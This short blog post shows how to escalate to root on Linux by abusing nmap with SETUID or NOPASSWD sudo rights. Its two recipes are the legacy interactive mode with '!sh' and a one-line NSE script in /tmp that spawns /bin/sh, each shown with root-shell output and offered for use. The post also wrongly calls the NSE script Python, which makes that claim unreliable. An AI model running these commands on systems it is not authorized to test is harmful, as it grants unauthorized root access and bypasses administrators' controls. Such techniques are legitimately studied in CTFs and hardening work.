Day 64: NMAP 2 ROOT FTW (with and without interactive mode)

Today post is short but sweet. So you may have seen people using nmap to escalate priveledges on Linux, this happens when there are correct SETUID bits or in a condition where you can exploit NOPASSWD sudo permissions. It usually goes a little something like this…

nmap --interactive OR sudo nmap --interactive
nmap> !sh
# id
uid=0(root) gid=0(root) groups=0(root)

This was fun for a long time and even better when CTFs use it as you can fly through the good ol’ nmap trick. But what about on newer versions where the interactive mode is not present. Do not fear, nmap script is here and ready to save the day.

echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse
root@box:/# id
uid=0(root) gid=0(root) groups=0(root)

Since the script is python, get creative! Endless possibilities.